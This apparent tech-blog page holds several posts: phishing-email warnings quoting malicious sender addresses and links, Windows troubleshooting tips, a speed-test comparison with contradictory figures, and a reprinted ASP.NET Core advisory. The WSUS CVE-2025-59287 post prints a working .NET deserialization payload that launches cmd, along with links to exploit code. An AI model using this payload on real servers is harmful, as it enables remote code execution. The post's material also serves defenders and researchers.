Sunday, November 9, 2025

Shoppers Drug Mart Phishing email with subject Shoppers Drug Mart Loyalty Program


For the record, this is a generic Shoppers Drug Mart phishing email attempt that is currently going around, with the subject "Shoppers Drug Mart Loyalty Program". What to do? Report it; see the bottom of the page.



From : Shoppers <maybell.idalinepw@sedfhgv.shopmys.best>
Subject : 
Shoppers Drug Mart Loyalty Program

identified this email as spam




PHISHING LINKS:

1. Hovering over the image reveals:
https://click.convertkit-mail2.com/xxxxx/xxx/xxx#xxxxx

How to tell this is a phishing email?


  1. Check the sender's email address in full; if it is not from the originating company, it is phishing.
  2. Hover over every link in the email; if it does not point to the company's website, forget it.
  3. The best way is to view the message source and examine whether the originating server and the links in the email are from the domain claimed.

How to examine the email message source?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links: anything that does not originate from the claimed domain.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take it further and report it here:

  1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Saturday, November 8, 2025

PoC code for Microsoft Windows Server Update Services (WSUS) attack CVE-2025-59287

CVE-2025-59287 is a critical RCE vulnerability in Microsoft Windows Server Update Services (WSUS), caused by unsafe deserialization of AuthorizationCookie data through BinaryFormatter in the EncryptionHelper.DecryptData() method. The vulnerability allows an unauthenticated attacker to achieve remote code execution with SYSTEM privileges by sending malicious encrypted cookies to the GetCookie() endpoint. Permanent mitigation requires replacing BinaryFormatter with secure serialization mechanisms, implementing strict type validation, and enforcing proper input sanitization on all cookie data.
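An added defender-side triage script, not taken from the linked articles or the PoC, for checking whether a host actually runs the WSUS role this CVE affects and what is listening for it. It assumes Windows Server, an elevated PowerShell session, the default WSUS ports 8530 (HTTP) and 8531 (HTTPS), and the service name WsusService.

```powershell
# Added example, not from the articles linked in this post: triage whether this
# Windows Server host runs the WSUS service that CVE-2025-59287 affects.
# Assumptions: elevated PowerShell on Windows Server; WSUS on its default ports
# 8530 (HTTP) and 8531 (HTTPS); the WSUS service is named WsusService.

$wsusPorts = @(8530, 8531)

function Get-WsusExposure {
    $result = [ordered]@{ Host = $env:COMPUTERNAME }

    # 1. Is the WSUS role installed? Get-WindowsFeature exists only on Windows Server.
    $role = Get-WindowsFeature -Name UpdateServices -ErrorAction SilentlyContinue
    $result.RoleInstalled = [bool]($role -and $role.Installed)

    # 2. State of the WSUS background service.
    $svc = Get-Service -Name WsusService -ErrorAction SilentlyContinue
    $result.ServiceStatus = if ($svc) { [string]$svc.Status } else { 'not present' }

    # 3. Listeners on the WSUS ports and the process that owns each one.
    $result.Listeners = @(
        Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue |
            Where-Object { $wsusPorts -contains $_.LocalPort } |
            ForEach-Object {
                $proc  = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
                $owner = if ($proc) { $proc.ProcessName } else { 'unknown' }
                '{0}:{1} owned by {2} (PID {3})' -f $_.LocalAddress, $_.LocalPort, $owner, $_.OwningProcess
            }
    )

    # 4. Most recent updates, so the fix for CVE-2025-59287 can be matched against the
    #    KB number given in Microsoft's advisory (not reproduced in this post).
    $result.RecentHotfixes = @(
        Get-HotFix -ErrorAction SilentlyContinue |
            Sort-Object InstalledOn -Descending |
            Select-Object -First 5 |
            ForEach-Object { '{0} ({1})' -f $_.HotFixID, $_.InstalledOn }
    )

    [pscustomobject]$result
}

$exposure = Get-WsusExposure
$exposure | Format-List
if ($exposure.RoleInstalled -and $exposure.ServiceStatus -eq 'Running') {
    Write-Warning 'WSUS is active on this host: confirm the CVE-2025-59287 update is installed.'
}
```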

PoC code below; excellent article:

CVE-2025-59287 WSUS Unauthenticated RCE | HawkTrace

PayloadsAllTheThings/Insecure Deserialization/DotNET.md at master · swisskyrepo/PayloadsAllTheThings (github.com)

dexterm300/cve-2025-59287-exploit-poc: Exploitation proof-of-concept for CVE-2025-59287 - a critical vulnerability in the Windows Server Update Service (WSUS) caused by the deserialization of untrusted data. This flaw allows an unauthorized attacker to execute arbitrary code over a network, posing a significant security risk. (github.com)

ObjectDataProvider used (www-cnblogs-com.translate.goog)

dotnet-deserialization/XmlSerializer.md at main · Y4er/dotnet-deserialization (github.com)

.NET Deserialization Exploitation Chain: A Beginner's Guide - XmlSerializer - FreeBuf Network Security Portal (www-freebuf-com.translate.goog)

PoC decoded payload, running calc.exe:

<Microsoft.PowerShell.Editor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35 Microsoft.VisualStudio.Text.Formatting.TextFormattingRunProperties.ForegroundBrush=Black><?xml version="1.0" encoding="utf-16"?>
<ObjectDataProvider MethodName="Start" IsInitialLoadEnabled="False" xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation" xmlns:sd="clr-namespace:System.Diagnostics;assembly=System" xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">
  <ObjectDataProvider.ObjectInstance>
    <sd:Process>
      <sd:Process.StartInfo>
        <sd:ProcessStartInfo Arguments="/c calc" StandardErrorEncoding="{x:Null}" StandardOutputEncoding="{x:Null}" UserName="" Password="{x:Null}" Domain="" LoadUserProfile="False" FileName="cmd" />
      </sd:Process.StartInfo>
    </sd:Process>
  </ObjectDataProvider.ObjectInstance>
</ObjectDataProvider>

Thursday, November 6, 2025

National Bank phishing email with subject Tax Residency Verification - Mandatory Renewal of Form


For the record, this is a National Bank phishing email attempt that is currently going around, with the subject "Tax Residency Verification — Mandatory Renewal of Form".

What to do? Report it; see the bottom of the page.


From : helpdesk@griolk.com
Subject : 
Tax Residency Verification — Mandatory Renewal of Form




PHISHING LINKS:

1. https://nbdb-entryt.com/?token=xxxxxxxxxxxxxxxxxx

How to tell this is a phishing email?

  1. Check the sender's email address in full; if it is not from the originating company, it is phishing.
  2. Hover over the images and every link in the email; if they do not point to the company's website, forget it.

How to examine the email message source?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links: anything that does not originate from the claimed domain.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take it further and report it here:

  1. https://www.google.com/safebrowsing/report_phish/


Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Wednesday, November 5, 2025

Windows - How to check svchost.exe outgoing connections to external DNS servers other than my local DNS


How to check effectively which remote addresses svchost.exe connects to.


I use a tool from Nirsoft that makes this easy: LiveTcpUdpWatch - View TCP/UDP network activity of every application on Windows (nirsoft.net)





LiveTcpUdpWatch row (non-empty columns only):

Process ID:        1672
Process Name:      svchost.exe
Protocol:          UDP IPv6
Local Port:        5355
Local Address:     ff02::1:3
Remote Port:       49911
Remote Address:    fe80::d4a5:1562:817:1350
Received Bytes:    48
Received Packets:  2
Process Path:      C:\Windows\System32\svchost.exe
Remote Host Name:  fe80::d4a5:1562:817:1350

Let's now examine the remote address fe80::d4a5:1562:817:1350: right-click on the line and choose the IPNetInfo lookup from the context menu.



You have to get IPNetInfo: Retrieve IP Address Information from WHOIS servers (nirsoft.net) and install it in the same directory, for example C:\Program Files (x86)\Nirsoft.

The text extracted from the resulting window is below, and it seems to show a connection to IANA for the DNS server.

#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#


NetRange:       FE80:: - FEBF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF:FFFF
CIDR:           FE80::/10
NetName:        IANA-LINK-LOCAL-UNICAST
NetHandle:      NET6-FE80-1
Parent:          ()
NetType:        IANA Special Use
OriginAS:       
Organization:   Internet Assigned Numbers Authority (IANA)
RegDate:        2022-02-26
Updated:        2024-05-24
Comment:        Link-Local Unicast [RFC4291]
Ref:            https://rdap.arin.net/registry/ip/FE80::



OrgName:        Internet Assigned Numbers Authority
OrgId:          IANA
Address:        12025 Waterfront Drive
Address:        Suite 300
City:           Los Angeles
StateProv:      CA
PostalCode:     90292
Country:        US
RegDate:        
Updated:        2024-05-24
Ref:            https://rdap.arin.net/registry/entity/IANA


OrgAbuseHandle: IANA-IP-ARIN
OrgAbuseName:   ICANN
OrgAbusePhone:  +1-310-301-5820 
OrgAbuseEmail:  abuse@iana.org
OrgAbuseRef:    https://rdap.arin.net/registry/entity/IANA-IP-ARIN

OrgTechHandle: IANA-IP-ARIN
OrgTechName:   ICANN
OrgTechPhone:  +1-310-301-5820 
OrgTechEmail:  abuse@iana.org
OrgTechRef:    https://rdap.arin.net/registry/entity/IANA-IP-ARIN


#
# ARIN WHOIS data and services are subject to the Terms of Use
# available at: https://www.arin.net/resources/registry/whois/tou/
#
# If you see inaccuracies in the results, please report at
# https://www.arin.net/resources/registry/whois/inaccuracy_reporting/
#
# Copyright 1997-2025, American Registry for Internet Numbers, Ltd.
#


AI Content


What is fe80::d4a5:1562:817:1350?

  • This is a link-local IPv6 address, part of the fe80::/64 range.

  • Link-local addresses are automatically assigned to network interfaces for communication within the same local network segment.

  • They are not routable on the internet and are used for internal purposes like device discovery and service resolution.

Why is svchost.exe connecting to it?

  • svchost.exe hosts many Windows services. In this case, it's likely handling:

    • LLMNR (Link-Local Multicast Name Resolution): Resolves names without DNS.

    • NDP (Neighbor Discovery Protocol): Detects other devices and configures network settings.

    • mDNS or SSDP: Service discovery protocols used by apps and devices.

These protocols use UDP over IPv6 to communicate with nearby devices using link-local addresses like fe80::d4a5:1562:817:1350.

🔐 Is this safe?

  • Yes, this is normal behavior in IPv6-enabled networks.

  • It’s part of how Windows discovers and interacts with other devices (printers, routers, etc.).

  • If you're concerned about privacy or traffic:

    • You can disable unused IPv6 features or the IP Helper service.

    • Use tools like Wireshark or Process Explorer to monitor activity.


IANA server?

The connection to fe80::/64 by svchost.exe on Windows 7 is not to an IANA server—it’s a local link-local IPv6 address used for internal network communication.

Here's a breakdown of what’s happening and why:

What is fe80::/64?

  • fe80::/64 is a reserved IPv6 address range for link-local communication.

  • These addresses are automatically assigned to network interfaces and are only valid within the local network segment.

  • They cannot be routed across the internet and are not associated with IANA servers or any external organization.

Why is svchost.exe connecting to it?

  • svchost.exe is a generic host process that runs Windows services.

  • In this case, it's likely hosting the IP Helper service (iphlpsvc), which supports IPv6 features like:

    • LLMNR (Link-Local Multicast Name Resolution) for name resolution without DNS

    • Neighbor Discovery Protocol (NDP) for detecting other devices on the local network

    • Multicast DNS (mDNS) or other service discovery protocols

These services use UDP over IPv6 to communicate with other devices on the same local network using link-local addresses like fe80::d4a5:1562:817:1350.
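An added example, not part of the post, that does in PowerShell what the explanation above does by hand: it classifies the remote addresses from the LiveTcpUdpWatch row (link-local and multicast are local traffic, not an IANA server) and then lists live TCP connections owned by svchost.exe with the services each instance hosts, flagging port 53 traffic to a resolver other than the host's configured DNS. It assumes Windows 8 / Server 2012 or later for the Get-Net* and Get-DnsClientServerAddress cmdlets; the 203.0.113.53 address is a constructed sample from the documentation range.

```powershell
# Added example, not part of the post. Get-NetUDPEndpoint only reports the local side of
# UDP sockets, which is why the post relies on LiveTcpUdpWatch for UDP peers such as the
# LLMNR entry above; the live section below therefore covers TCP connections.

function Get-AddressScope {
    param([Parameter(Mandatory)][string]$Address)
    $ip = [System.Net.IPAddress]::Parse(($Address -replace '%.*$', ''))   # drop zone id such as %12
    if ([System.Net.IPAddress]::IsLoopback($ip)) { return 'loopback' }
    if ($ip.AddressFamily -eq 'InterNetworkV6') {
        if ($ip.IsIPv6LinkLocal) { return 'link-local IPv6 (fe80::/10, never routed, not an IANA server)' }
        if ($ip.IsIPv6Multicast) { return 'multicast IPv6 (ff00::/8, e.g. LLMNR ff02::1:3)' }
        return 'global IPv6'
    }
    $b = $ip.GetAddressBytes()
    if ($b[0] -eq 10 -or ($b[0] -eq 172 -and $b[1] -ge 16 -and $b[1] -le 31) -or
        ($b[0] -eq 192 -and $b[1] -eq 168)) { return 'private IPv4 (RFC 1918)' }
    if ($b[0] -eq 169 -and $b[1] -eq 254) { return 'link-local IPv4 (169.254.0.0/16)' }
    if ($b[0] -ge 224 -and $b[0] -le 239) { return 'multicast IPv4' }
    return 'global IPv4'
}

# The two addresses from the LiveTcpUdpWatch row above, plus one constructed sample from the
# 203.0.113.0/24 documentation range standing in for an external DNS server.
foreach ($a in 'fe80::d4a5:1562:817:1350', 'ff02::1:3', '203.0.113.53') {
    '{0,-28} {1}' -f $a, (Get-AddressScope $a)
}

# Map each svchost.exe PID to the services it hosts (Win32_Service exposes ProcessId).
$svcByPid = @{}
Get-CimInstance Win32_Service | Where-Object { $_.ProcessId -gt 0 } | ForEach-Object {
    $svcByPid[[int]$_.ProcessId] += @($_.Name)
}
$svchostPids = @(Get-Process -Name svchost -ErrorAction SilentlyContinue | ForEach-Object Id)
$myDns = @((Get-DnsClientServerAddress -ErrorAction SilentlyContinue).ServerAddresses | Sort-Object -Unique)

Get-NetTCPConnection -ErrorAction SilentlyContinue |
    Where-Object { $svchostPids -contains $_.OwningProcess -and $_.State -ne 'Listen' -and
                   $_.RemoteAddress -notin @('0.0.0.0', '::') } |
    ForEach-Object {
        [pscustomobject]@{
            PID        = $_.OwningProcess
            Services   = ($svcByPid[[int]$_.OwningProcess] -join ',')
            Remote     = '{0}:{1}' -f $_.RemoteAddress, $_.RemotePort
            Scope      = Get-AddressScope $_.RemoteAddress
            # Port 53 to an address that is not one of this host's configured resolvers is
            # the "DNS server other than my local DNS" case in the title of this post.
            ForeignDns = ($_.RemotePort -eq 53 -and $myDns -notcontains $_.RemoteAddress)
        }
    } | Sort-Object Scope | Format-Table -AutoSize
```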

Thursday, October 30, 2025

How to uninstall if installer is not there and checking for malware



There's a better way to uninstall programs that do not have an installer, and I recommend using Nirsoft's UninstallView

UninstallView - View installed applications on Windows 11 / 10 / 8 / 7 / Vista and optionally uninstall them (nirsoft.net)

UninstallView is a tool for Windows that collects information about all programs installed on your system and displays the details of the installed programs in one table, so you can interrogate the columns.

Sorting by the Publisher column to reveal entries with an empty publisher is a good way to check for malware.


Available columns to sort by

Field: Description
Display Name: The official display name of the software (stored in the Registry)
Registry Name: The name of the Registry key (under HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall or HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall)
Display Version: The official display version of the software (stored in the Registry)
Registry Time: The date/time that the Registry key of the software was modified
Install Date: The official install date of the software, stored in the Registry by the installer
Installed For: Indicates whether the software was installed for a specific user or all users
Install Location: The path of the folder where the software is installed
Install Folder Created Time: The creation date/time of the installation folder
Install Folder Modified Time: The modified date/time of the installation folder
Publisher: The creator of the software
Uninstall String: Full command to uninstall the software
Quiet Uninstall String: Full command to quietly uninstall the software
Change Install String: Full command to change the installation of the software
Comments: Comment about the software, stored in the uninstall Registry key
About URL: URL to the publisher's or application's home page
Update Info URL: URL used to update information on the application
Help Link: Internet address for technical support
Install Source: The folder that contained the installer files
Installer Name: Name of the installer used (e.g., Windows Installer, Inno Setup)
Release Type: Displays the release type of the software (e.g., Security Update)
Display Icon Path: Full path of the icon file
MSI Filename: Specifies the MSI filename (Windows Installer only)
Estimated Size: Estimated size of the software (from the Registry)
Attributes: Attributes stored in the uninstall Registry key (e.g., System Component)
Language: Language of the software (e.g., en-US)
Parent Key Name: Registry name of the parent uninstall item
Registry Key: Full path of the uninstall Registry key

Download UninstallView - View installed applications on Windows 11 / 10 / 8 / 7 / Vista and optionally uninstall them (nirsoft.net)

UninstallView reads the registry key below for you.

For a more technical, manual removal you can explore the same key yourself in the Registry Editor:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Uninstall
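An added example, not part of the post or of UninstallView, that reads the same uninstall keys directly and applies the check described above (entries with an empty Publisher), plus one more worth a look: software installed under the user profile or a Temp folder rather than Program Files. Besides the HKLM and HKCU keys listed above it assumes the WOW6432Node key that 32-bit applications use on 64-bit Windows.

```powershell
# Added example, not part of the post: enumerate the uninstall registry keys and flag
# entries with an empty Publisher or an install path under the user profile / Temp.
# A hit is a reason to look closer, not proof of malware: some legitimate per-user
# installers also live in AppData.

$uninstallRoots = @(
    'HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall',
    'HKLM:\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall',   # 32-bit apps on 64-bit Windows
    'HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall'
)

function Get-UninstallEntry {
    foreach ($root in $uninstallRoots) {
        if (-not (Test-Path $root)) { continue }
        foreach ($key in Get-ChildItem -Path $root -ErrorAction SilentlyContinue) {
            $p = Get-ItemProperty -Path $key.PSPath -ErrorAction SilentlyContinue
            if (-not $p.DisplayName) { continue }      # component/patch keys without a display name
            $loc = if ($p.InstallLocation) { $p.InstallLocation } else { $p.UninstallString }
            [pscustomobject]@{
                DisplayName     = $p.DisplayName
                Publisher       = $p.Publisher
                InstallDate     = $p.InstallDate
                InstallLocation = $p.InstallLocation
                UninstallString = $p.UninstallString
                RegistryKey     = $key.Name
                # Same idea as sorting the Publisher column in UninstallView
                NoPublisher     = [string]::IsNullOrWhiteSpace($p.Publisher)
                # Installed under the profile or a Temp folder instead of Program Files
                UserProfilePath = ($loc -match [regex]::Escape($env:USERPROFILE)) -or ($loc -match '\\AppData\\|\\Temp\\')
            }
        }
    }
}

Get-UninstallEntry |
    Where-Object { $_.NoPublisher -or $_.UserProfilePath } |
    Sort-Object NoPublisher -Descending |
    Format-Table DisplayName, Publisher, InstallLocation, RegistryKey -AutoSize
```

The UninstallString column of a flagged entry is the command UninstallView would run for you; for a manual removal, inspect the key path shown in RegistryKey.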



Tuesday, October 28, 2025

Cloud Storage Phishing email with subject Final Warning: Your Cloud Storage has reached its limit


For the record, this is a generic cloud-storage phishing email attempt that is currently going around, with the subject "Final Warning: Your Cloud Storage has reached its limit". What to do? Report it; see the bottom of the page.




From : CLoud_Notification<tyler.johnson232@prohibitionatl.com>
Subject : 
Final Warning: Your Cloud Storage has reached its limit

Outlook has identified this email as spam

PHISHING LINKS:

1. Hovering over the image reveals:
http://216.226.28.34.bc.googleusercontent.com/%dddddddddddd

How to tell this is a phishing email?

  1. Check the sender's email address in full; if it is not from the originating company, it is phishing.
  2. Hover over every link in the email; if it does not point to the company's website, forget it.
  3. The best way is to view the message source and examine whether the originating server and the links in the email are from the domain claimed.

How to examine the email message source?

Now let's look at the message source:
  1. Outlook.com->Actions->View Message Source.
  2. Gmail.com->More (down arrow to top right)->Show original.
Check for suspicious links: anything that does not originate from the claimed domain.


Report Phishing Email (not as Spam)

  1. Outlook.com->Junk (at Top)->Phishing Scam
  2. Gmail.com->More (down-arrow to top right)->Report Phishing 

Report Phishing

If you have received this email, take it further and report it here:

  1. https://www.google.com/safebrowsing/report_phish/

Report phishing at Microsoft and government agencies

  1. http://www.microsoft.com/security/online-privacy/phishing-faq.aspx

Monday, October 27, 2025

MLab Internet Speed Test by Google - a more accurate internet speed test


MLab Internet Speed Test



Legacy Internet Speed Test Explained

Most internet speed tests are based on the traditional measurement of downloading a single stream (one large file). This is not a true representation of the start/stop mixed traffic that your browser generates.

Most of us mostly experience internet speed while browsing sites. A typical browser loads thousands of small files (HTML, CSS, JS, media files) when you visit a page.

Nowadays, even traditional single-file video streams are chunked into smaller pieces, so a single-file download test is outdated. The picture below shows the files loaded when watching a YouTube.com video.

A modern, mixed-traffic internet speed test was therefore needed: enter M-Lab Tests - M-Lab (measurementlab.net)


Legacy Internet Speed Test

Speed test by Ookla (used by all internet providers) measures only a continuous single stream (large file download), which is not a true representation of the start/stop mixed traffic of a browser.




I am contracted with Rogers for 1.5Mbps down, 50Mbps up, and this lines up conveniently, but my internet is slow.

MLab Internet Speed Test is blocked internally by Rogers Support, as I found when I recently called a technician about my slow internet!
 

Modern Internet Speed Test


The Measurement Lab test, sponsored by Google, uses mixed traffic. MSAK measures multi-stream traffic, focusing on throughput and latency, while NDT focuses on single-stream upload/download speeds and network diagnostics. MSAK is the more realistic internet traffic measurement.



Do the MLab Internet Speed Test



The MSAK test is a load test that more accurately represents browsing websites.

                NDT           MSAK
Test Server     Toronto, CA   Toronto, CA
Download        409.85 Mb/s   711.61 Mb/s
Upload          17.36 Mb/s    5.87 Mb/s
Latency         38 ms         20 ms
Retransmission  0.23%         0.00%


Modern Internet Speed Test Explained

MSAK (Measurement Swiss-Army Knife)

MSAK is a measurement service hosted by M-Lab that implements two different test protocols:

  • throughput: A configurable Websocket-based throughput measurement protocol capable of multi-stream tests. Its design is partially based on M-Lab’s single-stream measurement protocol, NDT. Configurable parameters currently include:
    • Number of streams
    • Congestion control algorithm
    • Test duration
    • Per-stream byte limit
  • latency: A UDP-based latency measurement protocol.

This measurement is more reflective of website browsing traffic.

NDT (Network Diagnostic Tool)

NDT is a single stream performance measurement of a connection’s capacity for “bulk transport” (as defined in IETF’s RFC 3148). NDT reports upload and download speeds and latency metrics.

This is more like a traditional test: a more technical test used for diagnosing issues with the network.

Copilot Comparison

🔍 Key Differences

Feature           | MSAK                                 | NDT
Measurement Type  | Throughput (multi-stream) + Latency  | Throughput (single-stream) + Diagnostics
Protocols Used    | WebSocket (TCP), UDP                 | TCP (BBR, Cubic, Reno)
Configurability   | High (streams, duration, CCA)        | Low (standardized test)
Diagnostic Depth  | Basic latency + throughput           | Detailed TCP-level diagnostics
Target Audience   | Researchers, engineers               | General users, policymakers


MSAK (Measurement Swiss-Army Knife)

Purpose: A flexible tool for measuring throughput and latency using configurable protocols.

  • Throughput Test:

    • Uses a WebSocket-based protocol.

    • Supports multi-stream testing.

    • Configurable parameters include:

      • Number of streams

      • Congestion control algorithm

      • Test duration

      • Per-stream byte limits

  • Latency Test:

    • Uses a UDP-based protocol to measure network latency.

  • Use Case: Ideal for researchers or engineers needing customizable network performance tests across multiple dimensions (e.g., congestion control behavior, stream concurrency).

NDT (Network Diagnostic Tool)

Purpose: Measures single-stream performance for bulk data transport, focusing on upload/download speeds and latency.

  • Metrics Reported:

    • Upload speed

    • Download speed

    • Latency (RTT)

    • Congestion indicators

    • TCP-level diagnostics (e.g., loss rate, retransmissions)

  • Protocols:

    • ndt7: Uses TCP BBR or Cubic, operates over HTTP(S) ports.

    • ndt5: Legacy support using Cubic.

    • web100: Deprecated, used Reno TCP.

  • Use Case: Best for users wanting a quick, standardized snapshot of their internet connection’s performance, especially for consumer advocacy or policy analysis.

Sunday, October 26, 2025

How to fix ASP.NET Core Vulnerability HTTP request smuggling bug scores 9.9



  • ASP.NET Core HTTP request smuggling bug scores 9.9

  • ‘Highest Ever’ Severity Score Assigned by Microsoft to ASP.NET Core Vulnerability

  • CVE-2025-55315 is an HTTP request smuggling bug leading to information leaks, file content tampering, and server crashes.

What is HTTP request smuggling



How to fix the issue 



From the above link, for those without a GitHub account:

Microsoft Security Advisory CVE-2025-55315: .NET Security Feature Bypass Vulnerability

Executive summary

Microsoft is releasing this security advisory to provide information about a vulnerability in ASP.NET Core 10.0, ASP.NET Core 9.0, ASP.NET Core 8.0, and ASP.NET Core 2.3. This advisory also provides guidance on what developers can do to update their applications to address this vulnerability.

Inconsistent interpretation of http requests ('http request/response smuggling') in ASP.NET Core allows an authorized attacker to bypass a security feature over a network.

Discussion

Discussion for this issue can be found at dotnet/aspnetcore#64033

Mitigation factors

Microsoft has not identified any mitigating factors for this vulnerability.

Affected software

  • Any ASP.NET Core 10.0 application running on ASP.NET Core 10.0.0-rc.1.25451.107 or earlier.
  • Any ASP.NET Core 9.0 application running on ASP.NET Core 9.0.9 or earlier.
  • Any ASP.NET Core application running on ASP.NET Core 8.0.20 or earlier.
  • Any ASP.NET Core 2.x application consuming the package Microsoft.AspNetCore.Server.Kestrel.Core version 2.3.0 or earlier.

Affected Packages

The vulnerability affects any Microsoft .NET Core project if it uses any of the affected package versions listed below.

Package name                               Affected version   Patched version
Microsoft.AspNetCore.Server.Kestrel.Core   <= 2.3.0           2.3.6

ASP.NET Core 10

Package name                                       Affected version        Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm         10.0.0-rc.1.25451.107   10.0.0-rc.2.25476.107
Microsoft.AspNetCore.App.Runtime.linux-arm64       10.0.0-rc.1.25451.107   10.0.0-rc.2.25476.107
Microsoft.AspNetCore.App.Runtime.linux-musl-arm    10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64  10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-musl-x64    10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.linux-x64         10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.osx-arm64         10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.osx-x64           10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-arm           10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-arm64         10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-x64           10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107
Microsoft.AspNetCore.App.Runtime.win-x86           10.0.0-rc.1.25451.107   10.0.0-rc.2.25502.107

ASP.NET Core 9

Package name                                       Affected version     Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm         >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.linux-arm64       >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-arm    >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64  >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.linux-musl-x64    >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.linux-x64         >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.osx-arm64         >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.osx-x64           >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.win-arm           >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.win-arm64         >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.win-x64           >= 9.0.0, <= 9.0.9   9.0.10
Microsoft.AspNetCore.App.Runtime.win-x86           >= 9.0.0, <= 9.0.9   9.0.10

ASP.NET Core 8

Package name                                       Affected version      Patched version
Microsoft.AspNetCore.App.Runtime.linux-arm         >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.linux-arm64       >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-arm    >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-arm64  >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.linux-musl-x64    >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.linux-x64         >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.osx-arm64         >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.osx-x64           >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.win-arm           >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.win-arm64         >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.win-x64           >= 8.0.0, <= 8.0.20   8.0.21
Microsoft.AspNetCore.App.Runtime.win-x86           >= 8.0.0, <= 8.0.20   8.0.21

Advisory FAQ

How do I know if I am affected?

If you have a runtime or SDK with a version listed, or an affected package listed in affected software or affected packages, you're exposed to the vulnerability.

How do I fix the issue?

  1. To fix the issue please install the latest version of .NET 9.0 and .NET 8.0. If you have installed one or more .NET SDKs through Visual Studio, Visual Studio will prompt you to update Visual Studio, which will also update your .NET SDKs.
  2. If your application references the vulnerable package, update the package reference to the patched version.
  • You can list the versions you have installed by running the dotnet --info command. You will see output like the following:



.NET SDK:
 Version:           9.0.100
 Commit:            59db016f11
 Workload version:  9.0.100-manifests.3068a692
 MSBuild version:   17.12.7+5b8665660

Runtime Environment:
 OS Name:     Mac OS X
 OS Version:  15.2
 OS Platform: Darwin
 RID:         osx-arm64
 Base Path:   /usr/local/share/dotnet/sdk/9.0.100/

.NET workloads installed:
There are no installed workloads to display.
Configured to use loose manifests when installing new manifests.

Host:
  Version:      9.0.0
  Architecture: arm64
  Commit:       9d5a6a9aa4

.NET SDKs installed:
  9.0.100 [/usr/local/share/dotnet/sdk]

.NET runtimes installed:
  Microsoft.AspNetCore.App 9.0.0 [/usr/local/share/dotnet/shared/Microsoft.AspNetCore.App]
  Microsoft.NETCore.App 9.0.0 [/usr/local/share/dotnet/shared/Microsoft.NETCore.App]

Other architectures found:
  x64   [/usr/local/share/dotnet]
    registered at [/etc/dotnet/install_location_x64]

Environment variables:
  Not set

global.json file:
  Not found

Learn more:
  https://aka.ms/dotnet/info

Download .NET:
